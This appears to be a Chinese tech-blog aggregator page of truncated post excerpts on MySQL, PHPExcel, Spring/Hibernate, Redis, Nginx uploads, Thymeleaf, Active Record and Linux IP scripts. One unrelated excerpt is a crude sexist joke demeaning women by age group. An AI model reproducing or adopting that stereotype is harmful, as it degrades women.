我们常常导入数据！mysql有一个高效导入方法，那就是load data infile 下面来看案例说明基本语法： load data [low_priority] [local] infile 'file_name txt' [replace | ignore] into table tbl_name [fields [terminated by't'] [OPTI
phpexcel导入excel表到数据库简单入门示例 dcj3sjt126com PHP Excel
跟导出相对应的，同一个数据表，也是将phpexcel类放在class目录下，将Excel表格中的内容读取出来放到数据库中 <?php error_reporting(E_ALL); set_time_limit(0); ?> <html> <head> <meta http-equiv="Content-Type"
22岁到72岁的男人对女人的要求 dcj3sjt126com
22岁男人对女人的要求是：一，美丽，二，性感，三，有份具品味的职业，四，极有耐性，善解人意，五，该聪明的时候聪明，六，作小鸟依人状时尽量自然，七，怎样穿都好看，八，懂得适当地撒娇，九，虽作惊喜反应，但看起来自然，十，上了床就是个无条件荡妇。 32岁的男人对女人的要求，略作修定，是：一，入得厨房，进得睡房，二，不必服侍皇太后，三，不介意浪漫蜡烛配盒饭，四，听多过说，五，不再傻笑，六，懂得独
Spring和HIbernate对DDM设计的支持 e200702084 DAO 设计模式 spring Hibernate 领域模型
A：数据访问对象 DAO和资源库在领域驱动设计中都很重要。DAO是关系型数据库和应用之间的契约。它封装了Web应用中的数据库CRUD操作细节。另一方面，资源库是一个独立的抽象，它与DAO进行交互，并提供到领域模型的“业务接口”。资源库使用领域的通用语言，处理所有必要的DAO，并使用领域理解的语言提供对领域模型的数据访问服务。
NoSql 数据库的特性比较 geeksun NoSQL
Redis 是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库，并提供多种语言的API。目前由VMware主持开发工作。 1. 数据模型作为Key-value型数据库，Redis也提供了键（Key）和值（Value）的映射关系。除了常规的数值或字符串，Redis的键值还可以是以下形式之一： Lists （列表） Sets
使用 Nginx Upload Module 实现上传文件功能 hongtoushizi nginx
转载自： http://www.tuicool.com/wx/aUrAzm 普通网站在实现文件上传功能的时候，一般是使用Python，Java等后端程序实现，比较麻烦。Nginx有一个Upload模块，可以非常简单的实现文件上传功能。此模块的原理是先把用户上传的文件保存到临时文件，然后在交由后台页面处理，并且把文件的原名，上传后的名称，文件类型，文件大小set到页面。下
spring-boot-web-ui及thymeleaf基本使用 jishiweili spring thymeleaf
视图控制层代码demo如下： @Controller @RequestMapping("/") public class MessageController { private final MessageRepository messageRepository; @Autowired public MessageController(Mes
数据源架构模式之活动记录 home198979 PHP 架构活动记录数据映射
hello!架构一、概念活动记录（Active Record）：一个对象，它包装数据库表或视图中某一行，封装数据库访问，并在这些数据上增加了领域逻辑。对象既有数据又有行为。活动记录使用直截了当的方法，把数据访问逻辑置于领域对象中。二、实现简单活动记录活动记录在php许多框架中都有应用，如cakephp。 <?php /** * 行数据入口类 *
Linux Shell脚本之自动修改IP pda158 linux centos Debian 脚本
作为一名 Linux SA，日常运维中很多地方都会用到脚本，而服务器的ip一般采用静态ip或者MAC绑定，当然后者比较操作起来相对繁琐，而前者我们可以设置主机名、ip信息、网关等配置。修改成特定的主机名在维护和管理方面也比较方便。如下脚本用途为：修改ip和主机名等相关信息，可以根据实际需求修改，举一反三！ #!/bin/sh #auto Change ip netmask ga
开发环境搭建独浮云 eclipse jdk tomcat
最近在开发过程中，经常出现MyEclipse内存溢出等错误，需要重启的情况，好麻烦。对于一般的JAVA+TOMCAT项目开发，其实没有必要使用重量级的MyEclipse，使用eclipse就足够了。尤其是开发机器硬件配置一般的人。 &n